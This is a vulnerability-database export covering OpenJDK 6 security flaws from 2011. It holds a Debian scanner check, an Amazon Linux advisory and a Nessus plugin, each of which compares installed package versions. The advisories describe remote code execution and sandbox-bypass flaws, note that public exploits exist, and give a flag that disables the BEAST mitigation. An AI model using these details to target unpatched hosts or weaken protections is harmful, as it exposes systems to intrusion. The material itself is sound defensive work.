script_tag(name:\"creation_date\", value:\"2012-02-11 02:33:35 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2356-1 (openjdk-6)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedtea6-plugin\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-dbg\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-demo\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-doc\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jdk\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-source\", ver:\"6b18-1.8.10-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-dbg\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-demo\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-doc\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jdk\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openjdk-6-source\", ver:\"6b24~pre2-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:05", "references": ["https://rhn.redhat.com/errata/RHSA-2011-1380.html"], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "src", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.src.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.6.0.0-52.1.9.10.40.amzn1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}], "description": "**Issue Overview:**\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. ([CVE-2011-3556 __](<https://access.redhat.com/security/cve/CVE-2011-3556>))\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. ([CVE-2011-3557 __](<https://access.redhat.com/security/cve/CVE-2011-3557>))\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially-crafted input. ([CVE-2011-3521 __](<https://access.redhat.com/security/cve/CVE-2011-3521>))\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. ([CVE-2011-3544 __](<https://access.redhat.com/security/cve/CVE-2011-3544>))\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. ([CVE-2011-3548 __](<https://access.redhat.com/security/cve/CVE-2011-3548>))\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. ([CVE-2011-3551 __](<https://access.redhat.com/security/cve/CVE-2011-3551>))\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially-crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. ([CVE-2011-3554 __](<https://access.redhat.com/security/cve/CVE-2011-3554>))\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. ([CVE-2011-3560 __](<https://access.redhat.com/security/cve/CVE-2011-3560>))\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection. ([CVE-2011-3389 __](<https://access.redhat.com/security/cve/CVE-2011-3389>))\n\nNote: This update mitigates the [CVE-2011-3389 __](<https://access.redhat.com/security/cve/CVE-2011-3389>) issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag \"-Djsse.enableCBCProtection=false\" to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads. ([CVE-2011-3547 __](<https://access.redhat.com/security/cve/CVE-2011-3547>))\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. ([CVE-2011-3558 __](<https://access.redhat.com/security/cve/CVE-2011-3558>))\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. ([CVE-2011-3553 __](<https://access.redhat.com/security/cve/CVE-2011-3553>))\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system. ([CVE-2011-3552 __](<https://access.redhat.com/security/cve/CVE-2011-3552>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.i686 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-14T14:26:00", "title": "Critical: java-1.6.0-openjdk", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:05", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2014-09-14T14:26:00", "id": "ALAS-2011-010", "href": "https://alas.aws.amazon.com/ALAS-2011-10.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:40:41", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-October/002411.html", "https://oss.oracle.com/pipermail/el-errata/2011-October/002414.html"], "pluginID": "68373", "description": "From Red Hat Security Advisory 2011:1380 :\n\nUpdated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag '-Djsse.enableCBCProtection=false' to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 7, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : java-1.6.0-openjdk (ELSA-2011-1380) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-07-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc"], "id": "ORACLELINUX_ELSA-2011-1380.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1380 and \n# Oracle Linux Security Advisory ELSA-2011-1380 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68373);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_bugtraq_id(49388, 49778, 50211, 50215, 50216, 50218, 50224, 50231, 50234, 50236, 50242, 50243, 50246, 50248);\n script_xref(name:\"RHSA\", value:\"2011:1380\");\n\n script_name(english:\"Oracle Linux 5 / 6 : java-1.6.0-openjdk (ELSA-2011-1380) (BEAST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1380 :\n\nUpdated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol)\ndeserialization code. An untrusted Java application or applet running\nin a sandbox could use this flaw to bypass sandbox restrictions by\ndeserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict\nthe privileges of sandboxed applications. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic\nshapes and images. An untrusted Java application or applet running in\na sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR\nfiles in pack200 format. A specially crafted JAR file could use this\nflaw to crash the Java Virtual Machine (JVM) or, possibly, execute\narbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager\nchecks in the setSSLSocketFactory method. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag '-Djsse.enableCBCProtection=false'\nto the java command.\n\nAn information leak flaw was found in the InputStream.skip\nimplementation. An untrusted Java application or applet could possibly\nuse this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted\nJava application or applet could use this flaw to disclose portions of\nthe VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK\nwas configured to include the stack trace in error messages sent to\nclients. A remote client could possibly use this flaw to obtain\nsensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002411.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002414.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.0.1.el5_7\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.0.1.el5_7\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.0.1.el5_7\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.0.1.el5_7\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.0.1.el5_7\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 